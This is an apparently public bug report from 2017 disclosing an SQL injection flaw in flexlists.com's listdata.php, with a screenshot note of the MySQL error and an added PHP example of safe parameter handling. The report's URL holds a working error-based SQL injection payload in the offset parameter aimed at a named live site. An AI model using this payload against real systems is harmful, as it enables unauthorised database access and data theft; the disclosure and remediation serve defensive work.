Bug on Flexlists - The Flexlists website has a bug in filtering out data passed to it when listing data; it's possible to pass arbitrary SQL queries to it. The URL was too long for the title, so here it is: https://flexlists.com/listdata.php?list_id=2424&pcid=&query=&offset=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)&num_items=50&sort=10699&dir=ASC



Domain: https://flexlists.com/listdata.php

Reported on flexlists.com

Total # of issues reported = 1

Reported by alienwithin

Total Points of alienwithin = 6

Browser Version: 56.0.2924

Operating System: Windows

OS Version: 7

Bug Type: General
Status: open
Added on: March 1, 2017, 8:32 a.m.

Screenshot (OCR, partly legible): the browser shows the request to listdata.php answered with the MySQL error "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ... at line 1", followed by the text of the failing query.
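How the parameters in the reported URL could be handled safely, as an added example that is not code from flexlists.com or from the reporter: numeric values are range-checked and bound as integers, and the sort column and direction come from allow-lists. The table `list_items`, its columns, the `int_param` and `list_rows` helpers and the in-memory SQLite database standing in for MySQL are all assumptions.

```php
<?php
// Added example; schema and helper names are hypothetical, not the site's own.
function int_param(array $src, string $key, int $min, int $max, ?int $default = null): int
{
    if (!isset($src[$key]) || $src[$key] === '') {
        if ($default === null) {
            throw new InvalidArgumentException("missing $key");
        }
        return $default;
    }
    // Rejects arrays, trailing SQL, hex, floats and out-of-range numbers.
    $v = filter_var($src[$key], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    if ($v === false) {
        throw new InvalidArgumentException("invalid $key");
    }
    return $v;
}

function list_rows(PDO $db, array $q): array
{
    $listId = int_param($q, 'list_id', 1, PHP_INT_MAX);
    $offset = int_param($q, 'offset', 0, 1000000, 0);
    $limit  = int_param($q, 'num_items', 1, 200, 50);
    // Identifiers and keywords cannot be bound, so map them from allow-lists.
    $sortCols = ['id' => 'id', 'title' => 'title'];          // hypothetical columns
    $sort = is_string($q['sort'] ?? null) ? $q['sort'] : 'id';
    $col  = $sortCols[$sort] ?? 'id';
    $dir  = (is_string($q['dir'] ?? null) && strtoupper($q['dir']) === 'DESC') ? 'DESC' : 'ASC';

    $st = $db->prepare(
        "SELECT id, title FROM list_items WHERE list_id = :l ORDER BY $col $dir LIMIT :n OFFSET :o");
    $st->bindValue(':l', $listId, PDO::PARAM_INT);
    $st->bindValue(':n', $limit, PDO::PARAM_INT);
    $st->bindValue(':o', $offset, PDO::PARAM_INT);
    $st->execute();
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database (stand-in for MySQL).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE list_items (id INTEGER PRIMARY KEY, list_id INT, title TEXT)");
$db->exec("INSERT INTO list_items (list_id, title) VALUES (2424, 'a'), (2424, 'b'), (7, 'other')");
print_r(list_rows($db, ['list_id' => '2424', 'offset' => '0', 'num_items' => '50', 'sort' => 'title', 'dir' => 'DESC']));
try {   // a non-integer offset, shortened from the reported URL, never reaches the query
    list_rows($db, ['list_id' => '2424', 'offset' => '-1 or 1=1', 'num_items' => '50']);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

The screenshot also shows the raw MySQL error and query text returned to the browser; logging such errors server-side and returning a generic message removes the feedback channel this class of bug relies on.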
